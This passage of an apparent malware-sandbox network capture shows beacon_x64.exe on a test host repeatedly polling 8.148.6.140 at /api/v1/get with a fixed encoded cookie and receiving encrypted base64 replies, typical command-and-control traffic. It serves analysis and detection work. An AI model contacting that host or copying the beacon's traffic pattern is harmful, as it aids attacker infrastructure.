          51192.168.2.6500388.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:38.691401005 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:39.643378973 CET401INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:39 GMT
          Server: nginx
          Content-Length: 216
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2f 63 78 53 42 72 30 66 5a 6a 57 50 53 66 43 41 43 70 7a 74 68 4c 39 53 6b 56 53 30 42 41 70 59 2f 4a 64 4b 71 7a 77 58 37 52 59 51 32 37 6a 44 51 4e 50 54 61 4d 67 45 38 6d 4e 4d 47 59 34 30 4d 6e 73 72 70 5a 61 6a 4c 55 32 4a 51 73 65 53 31 55 49 73 75 39 32 6c 34 70 7a 2f 58 76 31 52 4a 35 70 6e 54 36 46 43 38 59 76 77 32 4f 6b 30 79 39 2f 47 63 68 2b 58 75 45 39 50 68 44 35 6a 4e 31 35 31 5a 59 41 6a 61 6d 63 69 6c 2b 38 44 4d 4e 68 47 54 67 44 73 4b 46 68 65 71 55 56 4a 6b 69 6f 4e 6b 77 36 45 32 76 6f 42 4b 67 74 69 70 46 61 77 4c 78 75 74 6a 44 31 31 2f 32 77 2b 66 46 38 78 34 36 30 43 6c 51 79 74 70 77 37 63 49 6b 68 36 44 51 3d 3d
          Data Ascii: /cxSBr0fZjWPSfCACpzthL9SkVS0BApY/JdKqzwX7RYQ27jDQNPTaMgE8mNMGY40MnsrpZajLU2JQseS1UIsu92l4pz/Xv1RJ5pnT6FC8Yvw2Ok0y9/Gch+XuE9PhD5jN151ZYAjamcil+8DMNhGTgDsKFheqUVJkioNkw6E2voBKgtipFawLxutjD11/2w+fF8x460ClQytpw7cIkh6DQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          52192.168.2.6500398.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:39.765594959 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:40.722172022 CET337INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:40 GMT
          Server: nginx
          Content-Length: 152
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 5a 7a 66 4b 6f 71 67 47 6d 41 54 38 49 48 49 59 67 74 63 48 73 32 59 39 6c 63 4d 63 59 63 72 41 34 63 44 43 31 59 4d 78 66 4e 69 48 4f 30 4e 2f 4a 73 79 56 51 6a 35 6a 65 35 58 63 67 69 2b 52 32 71 45 33 58 46 58 77 57 4e 58 6a 42 59 36 2b 45 6e 48 35 78 77 2f 58 76 30 74 57 78 52 32 68 64 67 42 32 49 31 75 4b 47 77 47 71 59 68 48 74 54 43 44 62 75 2f 67 44 38 77 57 67 42 45 71 31 58 65 6e 41 36 43 72 7a 36 30 6a 35 48 6b 70 33 37 35 44 43 50 67 3d 3d
          Data Ascii: ZzfKoqgGmAT8IHIYgtcHs2Y9lcMcYcrA4cDC1YMxfNiHO0N/JsyVQj5je5Xcgi+R2qE3XFXwWNXjBY6+EnH5xw/Xv0tWxR2hdgB2I1uKGwGqYhHtTCDbu/gD8wWgBEq1XenA6Crz60j5Hkp375DCPg==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          53192.168.2.6500408.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:40.863178968 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:41.842161894 CET485INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:41 GMT
          Server: nginx
          Content-Length: 300
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 39 6d 63 68 69 73 49 59 56 64 64 7a 68 6b 36 68 4e 6e 6b 67 34 52 50 7a 34 63 55 6f 67 2f 37 54 2b 4a 4a 45 49 70 73 37 43 61 54 6b 62 6b 78 34 42 44 4d 69 53 6c 6e 46 30 76 48 75 63 4a 68 6a 2b 5a 32 74 69 65 4f 39 46 73 55 64 73 4c 44 6f 34 37 57 68 78 66 5a 49 67 6b 47 51 69 41 68 4d 50 64 30 63 66 49 31 6d 6d 56 31 6d 52 69 49 46 56 61 5a 61 4c 67 75 41 72 6f 59 67 36 76 48 59 31 75 63 31 48 42 30 48 5a 6f 75 52 6d 49 6c 51 52 34 32 46 55 39 6c 52 6d 6f 45 75 4b 50 65 36 38 61 31 30 53 47 70 48 54 42 42 55 70 30 4a 39 57 6d 55 69 51 5a 2f 49 76 70 76 5a 4a 4a 6e 44 77 6e 58 76 58 63 34 36 7a 62 6e 70 4d 6a 59 4b 49 4a 6f 41 70 6a 72 4f 54 37 58 35 36 5a 6b 44 45 4f 63 65 6b 59 66 56 53 48 6c 6a 69 78 4a 70 62 75 4a 2f 6f 56 49 64 53 78 43 4e 5a 32 66 74 6f 59 63 72 32 64 32 76 6b 63 5a 37 64 39 70 77 42 79 2f 6d 67 38 6e 4e 70 49 4f 35 2b 37 52 55 4f 72 34 6a 52 79 45 66 46 42 45 3d
          Data Ascii: 9mchisIYVddzhk6hNnkg4RPz4cUog/7T+JJEIps7CaTkbkx4BDMiSlnF0vHucJhj+Z2tieO9FsUdsLDo47WhxfZIgkGQiAhMPd0cfI1mmV1mRiIFVaZaLguAroYg6vHY1uc1HB0HZouRmIlQR42FU9lRmoEuKPe68a10SGpHTBBUp0J9WmUiQZ/IvpvZJJnDwnXvXc46zbnpMjYKIJoApjrOT7X56ZkDEOcekYfVSHljixJpbuJ/oVIdSxCNZ2ftoYcr2d2vkcZ7d9pwBy/mg8nNpIO5+7RUOr4jRyEfFBE=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          54192.168.2.6500418.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:41.953031063 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:42.940922976 CET465INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:42 GMT
          Server: nginx
          Content-Length: 280
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6c 69 4d 6f 4f 4b 4e 51 65 59 34 6b 35 75 52 34 6a 71 4b 49 50 63 53 6d 67 33 63 36 30 31 57 6a 43 68 65 6c 69 74 46 4a 75 68 58 42 73 78 33 63 6f 49 73 50 36 66 32 34 4d 79 62 2f 50 4e 47 6b 51 68 78 66 4d 53 42 43 72 42 4d 51 50 61 6d 48 46 30 64 34 74 55 50 71 30 48 30 32 54 59 73 6d 6b 6d 38 69 4c 67 70 53 41 4a 37 6d 33 39 34 73 75 32 63 36 2f 54 74 53 6a 46 79 47 75 67 64 50 6e 4e 71 34 36 6c 6d 48 52 57 32 50 78 59 66 44 59 32 45 57 53 67 76 54 2f 51 34 48 2f 6a 50 6f 61 76 42 34 54 4e 41 55 57 6c 43 63 76 4a 43 71 4a 32 46 2f 59 76 5a 6b 69 36 55 30 6e 64 36 77 52 49 58 73 37 38 75 43 53 52 6d 65 44 6e 69 7a 39 4c 42 50 78 48 46 70 50 38 37 71 43 2b 78 48 65 70 43 6d 33 42 50 42 53 31 59 50 43 59 4b 39 69 4e 67 6b 32 38 62 69 4a 6c 70 36 34 56 69 48 55 41 65 45 34 43 30 62 4a 39 73 33 34 58 52 52 6d 54 76 51 45 51 3d 3d
          Data Ascii: liMoOKNQeY4k5uR4jqKIPcSmg3c601WjChelitFJuhXBsx3coIsP6f24Myb/PNGkQhxfMSBCrBMQPamHF0d4tUPq0H02TYsmkm8iLgpSAJ7m394su2c6/TtSjFyGugdPnNq46lmHRW2PxYfDY2EWSgvT/Q4H/jPoavB4TNAUWlCcvJCqJ2F/YvZki6U0nd6wRIXs78uCSRmeDniz9LBPxHFpP87qC+xHepCm3BPBS1YPCYK9iNgk28biJlp64ViHUAeE4C0bJ9s34XRRmTvQEQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          55192.168.2.6500428.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:43.068310976 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:44.037074089 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:43 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:44.037169933 CET364INData Raw: 66 46 79 6a 2f 53 36 56 4a 73 6e 69 6d 53 42 30 55 32 52 73 4f 42 55 73 79 73 48 6c 68 68 2f 6c 58 4a 6f 57 46 38 51 70 38 71 35 78 62 30 71 30 4f 56 68 6d 69 70 56 73 35 57 6c 76 36 32 59 42 66 36 6c 67 7a 63 32 74 4f 57 62 5a 47 6a 4a 35 34 2b
          Data Ascii: fFyj/S6VJsnimSB0U2RsOBUsysHlhh/lXJoWF8Qp8q5xb0q0OVhmipVs5Wlv62YBf6lgzc2tOWbZGjJ54+ayJI/yeglVHkwPHLgltSsmzreLYUt651HKfmTz/JN6eiqhrD1pMz8mBEk/gjAReaDZezJ/pTGNOV0aepf2W5CddYSe3crNxe2iywozeCxg3Xdes3TDrVAaLKXOr2xuAqH1G/DD9cDhdRW/I4HlCrJiG8zd2+i67s8


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          56192.168.2.6500438.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:44.157594919 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:45.114870071 CET401INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:44 GMT
          Server: nginx
          Content-Length: 216
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 71 61 62 5a 54 37 30 6a 49 4b 2f 47 32 68 6f 37 6a 64 41 7a 61 55 36 71 4b 4a 4e 51 4f 4f 57 47 55 56 46 49 77 67 45 47 68 52 68 66 35 48 44 4f 72 73 69 71 6f 34 4e 77 34 71 36 33 7a 69 4e 53 43 48 34 36 77 36 4e 69 52 54 57 2f 61 52 6f 42 52 45 57 48 30 6a 65 73 4c 71 74 49 2f 6d 61 75 54 68 63 52 68 55 41 62 55 4d 62 4d 55 32 70 58 4e 69 71 4c 35 73 45 76 75 48 43 6f 58 35 65 47 78 57 63 4b 53 6e 48 58 44 51 59 33 58 4d 79 55 70 4b 6b 66 47 63 45 6c 41 38 31 46 49 4b 35 31 31 68 56 74 54 32 56 49 44 71 79 34 6b 50 41 41 6f 76 79 2f 45 6e 70 65 31 43 73 6f 48 43 68 56 4a 61 68 44 62 41 69 6a 71 51 42 75 35 44 78 35 47 46 6f 73 48 67 3d 3d
          Data Ascii: qabZT70jIK/G2ho7jdAzaU6qKJNQOOWGUVFIwgEGhRhf5HDOrsiqo4Nw4q63ziNSCH46w6NiRTW/aRoBREWH0jesLqtI/mauThcRhUAbUMbMU2pXNiqL5sEvuHCoX5eGxWcKSnHXDQY3XMyUpKkfGcElA81FIK511hVtT2VIDqy4kPAAovy/Enpe1CsoHChVJahDbAijqQBu5Dx5GFosHg==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          57192.168.2.6500448.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:45.239943027 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:46.176141977 CET569INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:46 GMT
          Server: nginx
          Content-Length: 384
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 6a 6d 56 71 57 38 30 2f 62 36 72 59 43 71 34 30 62 4e 72 58 33 38 33 77 72 48 56 43 41 53 6e 57 5a 37 39 4b 37 78 52 38 43 44 75 48 36 39 66 30 64 76 41 7a 2b 64 33 6b 59 42 63 74 51 54 42 72 66 38 47 41 62 6e 53 42 47 45 52 74 54 49 5a 4a 5a 69 32 62 57 63 6e 6e 63 51 62 4f 4d 66 4e 67 39 7a 65 48 41 31 4d 78 75 72 74 35 52 45 6d 62 6c 61 49 65 46 4e 6f 56 74 47 74 6c 74 4a 58 38 6d 44 48 61 4c 59 48 62 6e 4e 2f 53 74 53 55 47 70 34 7a 2f 38 39 68 6c 4f 6e 6c 63 32 30 42 4f 34 6f 4e 69 64 63 4f 53 53 49 32 32 35 68 6d 64 67 62 71 73 34 69 6c 34 78 76 77 41 69 58 56 72 35 6e 4b 32 50 44 2b 34 37 50 45 38 79 61 44 6c 48 4e 75 78 5a 53 57 72 50 58 36 62 36 44 37 68 68 62 39 44 5a 6b 44 4f 6e 79 6e 5a 6f 41 79 55 59 55 6e 2f 4d 6a 57 4a 50 42 4f 46 68 2b 6c 76 2f 38 58 4a 52 56 4c 30 34 4b 41 4c 36 74 47 77 75 6d 31 68 64 67 35 48 35 2b 4d 47 71 70 55 51 58 4f 50 5a 4c 5a 52 6a 53 4e 69 6a 39 71 72 67 61 4c 36 74 6f 74 6e 6c 7a 41 34 67 7a 64 35 74 78 66 67 36 38 31 53 58 2b 30 67 30 64 69 7a 57 4d 67 [TRUNCATED]
          Data Ascii: jmVqW80/b6rYCq40bNrX383wrHVCASnWZ79K7xR8CDuH69f0dvAz+d3kYBctQTBrf8GAbnSBGERtTIZJZi2bWcnncQbOMfNg9zeHA1Mxurt5REmblaIeFNoVtGtltJX8mDHaLYHbnN/StSUGp4z/89hlOnlc20BO4oNidcOSSI225hmdgbqs4il4xvwAiXVr5nK2PD+47PE8yaDlHNuxZSWrPX6b6D7hhb9DZkDOnynZoAyUYUn/MjWJPBOFh+lv/8XJRVL04KAL6tGwum1hdg5H5+MGqpUQXOPZLZRjSNij9qrgaL6totnlzA4gzd5txfg681SX+0g0dizWMgkLiVd9kN5+sCu+4Fy+SKafUNEJRFQjPuGvXWbzOXH2IDqp


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          58192.168.2.6500458.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:46.318027020 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:47.297995090 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:47 GMT
          Server: nginx
          Content-Length: 236
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:47.298146009 CET236INData Raw: 71 48 4d 4f 57 38 6d 42 38 4c 36 6a 78 31 49 6e 35 33 45 67 63 57 32 52 66 62 43 4e 68 49 72 38 66 63 44 34 72 56 46 4c 7a 78 62 2b 32 68 62 77 65 56 31 73 59 72 42 68 55 33 72 65 69 61 39 6a 61 38 76 73 50 30 32 30 46 4f 51 76 4b 35 70 48 42 38
          Data Ascii: qHMOW8mB8L6jx1In53EgcW2RfbCNhIr8fcD4rVFLzxb+2hbweV1sYrBhU3reia9ja8vsP020FOQvK5pHB86YM1ZMWxPlfRA104qHZwQ1/Ys55/CslWRnXFTObxDYZFderCjSNGaf3FdrvXkR1/UnZ/ROZuocjp38TiA+9R3hyJqmQ/MP6zeQeHoIi1dNl28aUyGlohP+t7XOziju3chfvyDEkxKVY8XT5bqdidO+wdE=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          59192.168.2.6500468.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:47.421591043 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:48.383600950 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:48 GMT
          Server: nginx
          Content-Length: 364
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:26:48.383712053 CET364INData Raw: 37 4b 62 4a 63 50 77 5a 7a 73 2f 76 30 44 30 45 47 56 2f 4f 66 33 6a 63 39 47 65 77 47 36 5a 42 63 42 43 41 6c 54 34 51 50 34 45 6d 6d 49 31 59 54 45 6f 42 63 52 42 65 4d 57 37 49 43 70 73 79 36 49 62 72 48 45 4d 44 4a 4d 39 4e 56 35 31 54 65 75
          Data Ascii: 7KbJcPwZzs/v0D0EGV/Of3jc9GewG6ZBcBCAlT4QP4EmmI1YTEoBcRBeMW7ICpsy6IbrHEMDJM9NV51TeuHD0B4X8xW6O6UL4i5VQXjcX8g5ahoOrE6tuEK+UVp3T46zC2JnhdhzEFQus65sfzKmQch6kqGMd6g59q3ImYYtZLRTDz3BZtM8ji4s3F0tNxCH7Hmr6fY8324YWYa/3vrW8CPojLV5ACQwDf/vokZWkJUkpBa8uTs


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          60192.168.2.6500478.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:48.507354021 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:50.069509029 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:49 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 62 4d 64 71 45 2b 76 77 65 45 52 42 43 56 35 66 43 55 74 39 57 64 6f 64 48 6d 58 46 37 59 4d 4f 4a 4a 4f 34 34 78 55 6a 77 4d 4f 35 67 4f 34 4c 36 53 4a 68 55 54 4a 6c 67 4a 6a 6d 4f 66 64 37 42 57 33 75 35 4e 55 31 77 78 45 76 35 30 4e 39 48 67 4d 55 53 6c 5a 2f 78 71 44 35 50 6f 4f 44 76 39 43 30 76 76 6a 72 37 30 73 3d
          Data Ascii: bMdqE+vweERBCV5fCUt9WdodHmXF7YMOJJO44xUjwMO5gO4L6SJhUTJlgJjmOfd7BW3u5NU1wxEv50N9HgMUSlZ/xqD5PoODv9C0vvjr70s=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          61192.168.2.6500488.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:50.188379049 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          62192.168.2.6500498.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:54.318365097 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:26:55.285631895 CET293INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:26:55 GMT
          Server: nginx
          Content-Length: 108
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 73 77 6b 2f 37 47 5a 53 41 77 6d 58 6a 6b 45 36 71 38 74 74 7a 56 65 57 49 4b 56 35 78 51 65 4e 69 34 31 41 34 49 39 49 6b 4e 43 6b 41 51 4e 67 65 68 55 70 6e 7a 68 64 39 4c 63 51 74 54 47 46 70 34 4b 49 59 39 4d 58 4c 44 6f 46 53 6d 2f 54 4d 7a 43 71 4d 39 6a 50 63 4f 43 30 5a 5a 50 43 36 6b 71 74 48 67 6a 2f 6b 30 67 3d
          Data Ascii: swk/7GZSAwmXjkE6q8ttzVeWIKV5xQeNi41A4I9IkNCkAQNgehUpnzhd9LcQtTGFp4KIY9MXLDoFSm/TMzCqM9jPcOC0ZZPC6kqtHgj/k0g=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          63192.168.2.6500508.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:26:55.405477047 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
